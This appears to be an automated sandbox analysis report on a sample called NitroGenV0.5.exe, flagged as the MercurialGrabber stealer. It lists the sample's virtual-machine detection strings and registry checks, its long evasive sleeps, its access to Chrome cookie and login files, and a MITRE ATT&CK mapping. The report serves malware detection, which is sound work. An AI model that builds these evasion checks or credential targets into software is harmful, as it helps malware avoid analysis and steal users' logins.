                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion:

                        barindex
                        Queries memory information (via WMI often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -98906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -98796s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -98684s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416Thread sleep time: -99892s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6412Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 1744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99642s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99500s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99391s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99281s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99172s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99063s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -98922s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -98813s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -98642s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99906s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940Thread sleep time: -99797s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6928Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeWindow / User API: threadDelayed 2881Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeWindow / User API: threadDelayed 404Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeWindow / User API: threadDelayed 718Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeWindow / User API: threadDelayed 2482Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99671Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99343Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99234Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99125Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99015Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 98906Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 98796Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 98684Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 99892Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99642Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99500Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99391Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99281Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99172Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99063Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 98922Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 98813Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 98642Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99906Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 99797Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: NitroGenV0.5.exe.6.drBinary or memory string: SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
                        Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmpBinary or memory string: VMware
                        Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpBinary or memory string: ISYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
                        Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpBinary or memory string: KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
                        Source: NitroGenV0.5.exe.6.drBinary or memory string: vmware
                        Source: NitroGenV0.5.exe, 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drBinary or memory string: virtualboxvboxqemu
                        Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                        Source: NitroGenV0.5.exeBinary or memory string: SOFTWARE\VMWare, Inc.\VMWare Tools
                        Source: wget.exe, NitroGenV0.5.exe, 00000006.00000003.301890578.0000000000F23000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: NitroGenV0.5.exe, 00000006.00000002.304952361.000000001BC13000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFCaPrYY
                        Source: NitroGenV0.5.exeBinary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
                        Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFC
                        Source: NitroGenV0.5.exe, 00000011.00000002.350055756.0000000000A5C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                        Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpBinary or memory string: "SOFTWARE\VMWare, Inc.\VMWare Tools
                        Source: NitroGenV0.5.exe, 00000006.00000002.303503092.000000001BB70000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: NitroGenV0.5.exe.6.drBinary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdevkSYSTEM\CurrentControlSet\Control\VirtualDeviceDriversESOFTWARE\VMWare, Inc.\VMWare ToolsUSOFTWARE\Oracle\VirtualBox Guest Additions1HARDWARE\ACPI\DSDT\VBOX_SSYSTEM\ControlSet001\Services\Disk\Enum\0cHARDWARE\Description\System\SystemBiosInformationYHARDWARE\Description\System\VideoBiosVersion]HARDWARE\Description\System\SystemManufacturer[HARDWARE\Description\System\SystemProductName[HARDWARE\Description\System\Logical Unit Id 0
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeQueries volume information: C:\Users\user\Desktop\download\NitroGenV0.5.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                        Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected MercurialGrabberShow sources
                        Source: Yara matchFile source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login DataJump to behavior

                        Remote Access Functionality:

                        barindex
                        Yara detected MercurialGrabberShow sources
                        Source: Yara matchFile source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation3Registry Run Keys / Startup Folder1Process Injection1Masquerading1OS Credential Dumping1Security Software Discovery311Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion231Security Account ManagerVirtualization/Sandbox Evasion231SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery33VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
